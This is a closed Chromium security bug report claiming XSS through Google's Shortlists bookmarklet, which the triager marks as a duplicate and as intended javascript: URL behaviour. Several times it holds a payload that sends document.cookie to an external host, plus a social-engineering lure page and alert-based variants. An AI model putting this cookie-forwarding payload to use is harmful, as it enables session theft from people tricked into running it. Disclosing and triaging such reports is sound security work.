
Issue 727074 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 657380
Owner: ----
Closed: May 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: XSS Vulnerability (Vulnerability in browser)

Reported by cemyldrmmmmm@gmail.com, May 28 2017

Issue description



VULNERABILITY DETAILS

Hi Google Security Team

Site information

Link:https://www.google.com/shopping/shortlists/button?nt=nse

Site description:Drag this button to your bookmarks bar/toolbar in your web browser

Drag this code:javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();

XSS Vulnerability available

1-Payload:alert(document.domain);

/*
 * Shortlists bookmarklet with one extra statement appended after the IIFE.
 * The IIFE registers a timestamp-named global callback, injects
 * https://apis.google.com/js/api.js with that name as ?onload=, and the
 * callback calls gapi.load('shortlists') and then removes itself from window.
 * The trailing alert(document.domain) runs only because the user saved this
 * exact text as a bookmark and then activated it; a javascript: bookmark
 * executes in whatever page is open at that moment, so the domain shown is
 * simply the current page's domain.
 * NOTE(review): the guard !(window.gapi && !window.gapi.load) routes the case
 * "gapi present but without load()" to the else branch, which then calls
 * window.gapi.load. This looks inverted; confirm against the upstream snippet.
 */
javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(document.domain);

2-Exploitation Payload:alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

/*
 * Shortlists bookmarklet with a cookie-forwarding statement appended after the
 * IIFE. The assignment to window.location.href navigates the current tab to
 * the external host with document.cookie in the query string; alert() then
 * receives the assigned URL string.
 * document.cookie returns only cookies that are not flagged HttpOnly, so
 * HttpOnly session cookies are not readable this way.
 * The statement executes only after the user installs this exact text as a
 * bookmark and clicks it on a page (the self-XSS / social-engineering case).
 * It is not script injected into the page by the site.
 */
javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);


VERSION
Chrome Version: [Chromium version:61.0.3114.0] + [dev]
Operating System: [Windows 7 Ultimate, Service Pack 1]

REPRODUCTION CASE
START XSS POC
1-Click on this link: https://sites.google.com/site/klasiktestyapmak

installed in the site:<iframe src="https://bubirtest.blogspot.de/2017/05/shortlistbutton.html" width="1800" height="1800">iframe</iframe>


2-Drag this button to your bookmarks bar/toolbar in your web browser

Payload(1):alert(document.domain);

/*
 * Reproduction-step copy of the bookmarklet with alert(document.domain)
 * appended after the IIFE. The IIFE loads api.js and shows the shortlists UI;
 * the appended alert is a separate statement in the same javascript: URL.
 * It runs in the page that is open when the user clicks the saved bookmark,
 * which is why the popup reports that page's domain.
 */
javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(document.domain);


Exploitation Payload(2):alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

/*
 * Reproduction-step copy of the bookmarklet with the cookie-forwarding
 * statement appended after the IIFE. Setting window.location.href sends the
 * tab to the external URL with document.cookie appended as a query parameter.
 * Only cookies without the HttpOnly flag are visible to document.cookie.
 * Execution depends on the user having saved and clicked this bookmark text.
 */
javascript:(function() {var methName = '__SHORTLISTS_LOADER' + (new Date().getTime()); function loadShortlist() {window.gapi.load('shortlists', {callback: function() { gapi.shortlists.show(); }});}; if (!(window.gapi && !window.gapi.load)) {window[methName] = function() {loadShortlist(); try {delete window[methName]} catch (e) {window[methName] = null;}}; var s = document.createElement('script'); s.async = true; s.src = 'https://apis.google.com/js/api.js?onload=' + methName; document.getElementsByTagName('head')[0].appendChild(s);} else {loadShortlist();}})();alert(window.location.href="https://speed000.000webhostapp.com/index.php?cookie="+ document.cookie);

3-Click to save to short list

Result:XSS Popup(sites.google.com) and Vulnerability in browser

Best Regards:Cem Yıldırım

Good work



 
xss.sites.google.com.png
267 KB View Download
example.html
114 bytes View Download
Components: UI>Browser>Bookmarks
Mergedinto: 657380
Status: Duplicate (was: Unconfirmed)
Support for JavaScript: URLs in bookmarks is a Working-As-Intended feature in the browser; see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-

Comment 2 Deleted

Comment 3 Deleted

Project Member

Comment 4 by sheriffbot@chromium.org, Aug 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
